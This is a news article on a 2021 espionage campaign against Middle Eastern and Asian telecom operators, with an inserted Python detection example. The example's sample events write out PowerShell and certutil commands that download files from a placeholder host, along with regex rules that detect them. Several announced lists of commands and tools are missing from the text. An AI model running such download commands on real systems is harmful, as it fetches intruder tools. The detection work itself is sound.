Dec 16, 2021
Telecom operators targeted in recent espionage hacking campaign

Researchers have spotted a new espionage hacking campaign targeting telecommunication and IT service providers in the Middle East and Asia.
The campaign has been conducted over the past six months, and there are tentative links to the Iranian-backed actor MERCURY (aka MuddyWater, SeedWorm, or TEMP.Zagros).
The report comes from the Threat Hunter Team at Symantec, which has collected evidence and toolset samples from recent attacks in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand, and Laos.
The attackers appear to be most interested in vulnerable Exchange Servers, which they use for web shell deployment.
After the initial breach, they steal account credentials and move laterally in the corporate network. In some cases, they use their foothold to pivot to other connected organizations.
Although the infection vector is unknown, Symantec was able to find a case of a ZIP file named “Special discount,” which contained an installer for a remote desktop software application.
As such, the threat actors may be distributing spear-phishing emails to specific targets.
The first sign of compromise by the threat actors is typically the creation of a Windows service to launch a Windows Script File (WSF) that performs reconnaissance on the network.
Next, PowerShell is used to download more WSFs, and Certutil is used to download tunneling tools and run WMI queries.
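The three-stage sequence described above (a service that launches a WSF, PowerShell fetching further scripts, Certutil pulling down tools) is something a defender can hunt for in endpoint telemetry. The following is an added example, not code from the article or from Symantec: it runs simple rules over constructed, flattened Windows event lines (System log event 7045 for service installs, Security log event 4688 for process creation with command-line auditing enabled) and reports whether the whole chain is present. Field names and sample hosts/paths are assumptions for illustration.

```python
import re

# Constructed sample telemetry (not taken from the report), one event per line:
# event ID first, then the relevant fields of the Windows event.
SAMPLE_EVENTS = [
    "7045 ServiceName=UpdateSvc ImagePath=C:\\Windows\\System32\\wscript.exe C:\\ProgramData\\init.wsf",
    "4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -c (New-Object Net.WebClient).DownloadFile('http://203.0.113.5/a.wsf','C:\\ProgramData\\a.wsf')",
    "4688 NewProcessName=C:\\Windows\\System32\\certutil.exe "
    "CommandLine=certutil -urlcache -split -f http://203.0.113.5/t.exe C:\\ProgramData\\t.exe",
    "4688 NewProcessName=C:\\Windows\\System32\\notepad.exe CommandLine=notepad C:\\Users\\a\\notes.txt",
]

# One rule per stage of the chain the article describes. Each regex is anchored
# on the event ID so a process-creation line cannot satisfy the service rule.
RULES = {
    # Stage 1: a new service whose binary path runs a Windows Script File.
    "service_launches_wsf": re.compile(r"^7045 .*ImagePath=.*\b[wc]script\.exe.*\.wsf", re.I),
    # Stage 2: PowerShell retrieving content over HTTP with the .NET WebClient.
    "powershell_download": re.compile(r"^4688 .*powershell.*Download(File|String)\(", re.I),
    # Stage 3: certutil's URL cache option used to fetch a remote file.
    "certutil_download": re.compile(r"^4688 .*certutil.*-urlcache.*https?://", re.I),
}


def match_events(events):
    """Return (rule_name, event) pairs for every event that triggers a rule."""
    hits = []
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev):
                hits.append((name, ev))
    return hits


def chain_detected(events):
    """True only when every stage of the described sequence appears in the data."""
    seen = {name for name, _ in match_events(events)}
    return seen == set(RULES)


if __name__ == "__main__":
    for name, ev in match_events(SAMPLE_EVENTS):
        print(f"[{name}] {ev[:80]}")
    print("full chain present:", chain_detected(SAMPLE_EVENTS))
```

Individual hits are only weak signals on their own (certutil and PowerShell downloads occur in legitimate administration); requiring the stages together on one host is what lowers the false-positive rate.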
“Based on process lineage data, attackers seemed to use scripts extensively. These may be automated scripts used for collecting information and downloading additional tools,” explains Symantec’s report.
“However, in one instance, a command asks cURL for help, suggesting that there may have been at least some hands-on-keyboard activity on the part of the attackers.”
Having established their presence on the target organization, the actors use the eHorus remote access tool, which enables them to do the following:
To pivot to other telcos, the actors look for potential Exchange Web Services links and use the following commands for this purpose:
The full list with the toolset used by the particular actor is given below:
Most of these tools are publicly available tools commonly used by offensive security teams, so they may not trigger alarms in organizations.
Even though the attribution isn’t definitive, Symantec logged two IP addresses that overlap with infrastructure used in older MuddyWater attacks.
Moreover, the toolset features several similarities to March 2021 attacks reported by Trend Micro researchers.
Still, many Iranian state-supported actors use off-the-shelf tools and regularly switch infrastructure, and as such, no conclusive attribution can be made at this time.
Copyright @ 2003 – 2021 Bleeping Computer® LLC – All Rights Reserved
Article Categories:
Cybersecurity News